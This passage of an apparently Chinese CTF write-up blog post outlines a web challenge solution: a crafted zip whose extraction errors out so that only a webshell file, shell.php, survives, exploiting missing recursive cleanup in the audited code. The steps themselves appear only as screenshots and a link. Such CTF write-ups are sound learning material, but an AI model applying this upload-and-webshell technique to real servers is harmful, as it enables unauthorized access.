<p>思路是创造一个zip，然后让这个zip里面包含一个shell，但是解压的时候会出错，只能解压出shell.php</p>
<p>为什么呢，这段源码经过审计，发现没有递归删除文件，也没有删除文件夹。</p>
<p>具体操作</p>
<p class='item-img' data-src='/2023/05/09/%E9%B9%8F%E5%9F%8E%E6%9D%AF2022/image-20230512084404245.png'><img src="/2023/05/09/%E9%B9%8F%E5%9F%8E%E6%9D%AF2022/image-20230512084404245.png" alt="image-20230512084404245"></p>
<p class='item-img' data-src='/2023/05/09/%E9%B9%8F%E5%9F%8E%E6%9D%AF2022/image-20230512084413404.png'><img src="/2023/05/09/%E9%B9%8F%E5%9F%8E%E6%9D%AF2022/image-20230512084413404.png" alt="image-20230512084413404"></p>
<p><a target="_blank" rel="noopener" href="https://www.yuque.com/zouyii/kteg8l/pnk84i4h17wfdhag#8f05a9f3">https://www.yuque.com/zouyii/kteg8l/pnk84i4h17wfdhag#8f05a9f3</a></p>
<div id="paginator"></div></div><div id="post-footer"><div id="pages"><div class="footer-link" style="width: 50%;text-align:right;border-right:1px #fe2 solid"><a href="/2023/05/11/%E6%97%A0%E5%8F%82%E6%95%B0rce/">← Next 无参数rce</a></div><div class="footer-link" style="width: 50%;right:1px;border-left:1px #fe2 solid"><a href="/2023/05/09/php-bugs-master-1%E5%88%B05/">php_bugs-master-1到5 Prev →</a></div></div></div></div><div class="bottom-btn"><div><a id="to-top" onClick="scrolls.scrolltop();" title="回到顶部" style="opacity: 0; display: none;">∧</a><a id="to-index" href="#toc-div" title="文章目录">≡</a><a id="color-mode" onClick="colorMode.change()" title="切换主题"></a></div></div></article><aside><div id="about"><a href="/" id="logo"><img src="https://ak.hypergryph.com/assets/index/images/ak/pc/faction/1.png" alt="Logo"></a><h1 id="Dr"><a href="/">Dr0se</a></h1><div id="description"><p></p></div></div><div id="aside-block"><div id="toc-div"><h1>目录</h1><ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link"><span class="toc-number">1.</span> <span class="toc-text">[鹏城杯 2022]简单包含</span></a></li><li class="toc-item toc-level-1"><a class="toc-link"><span class="toc-number">2.</span> <span class="toc-text">[鹏城杯 2022]简单的php</span></a></li><li class="toc-item toc-level-1"><a class="toc-link"><span class="toc-number">3.</span> <span class="toc-text">[鹏城杯 2022]压缩包</span></a></li></ol></div></div><footer><nobr>构建自 <a target="_blank" rel="noopener" href="http://hexo.io">Hexo</a></nobr><wbr><nobr> 使用主题 <a target="_blank" rel="noopener" href="https://github.com/Yue-plus/hexo-theme-arknights">Arknights</a></nobr><wbr><nobr>主题作者 <a target="_blank" rel="noopener" href="https://github.com/Yue-plus">Yue_plus</a></nobr></footer></aside></main><canvas id="canvas-dust"></canvas><script src="/js/search.js"></script><script src="/js/arknights.js"></script><script src="//unpkg.com/lightgallery@2.7.1/lightgallery.min.js"></script><script src="//unpkg.com/lightgallery@2.7.1/plugins/zoom/lg-zoom.min.js"></script><script src="//unpkg.com/lightgallery@2.7.1/plugins/thumbnail/lg-thumbnail.min.js"></script><script src="/js/pjax.js"></script><script class="pjax-js">reset= () => {code.findCode();
document.querySelector('.lg-container')?.remove()
lightGallery(document.getElementById('post-bg'), {
  plugins: [lgZoom,lgThumbnail],
  selector: '.item-img'})}</script><script>window.addEventListener("load",() => {pjax = new Pjax({
 cacheBust: false,
 selectors: ['title','article','#aside-block','.pjax-js'],
 switches: {'article': Pjax.switches.sideBySide},
 switchesOptions: {
   'article': {
     classNames: {
       remove: "pjax-out",
       add: "pjax-in"
     }
   }
 }
});
document.addEventListener("pjax:complete", reset);reset()})</script></body></html>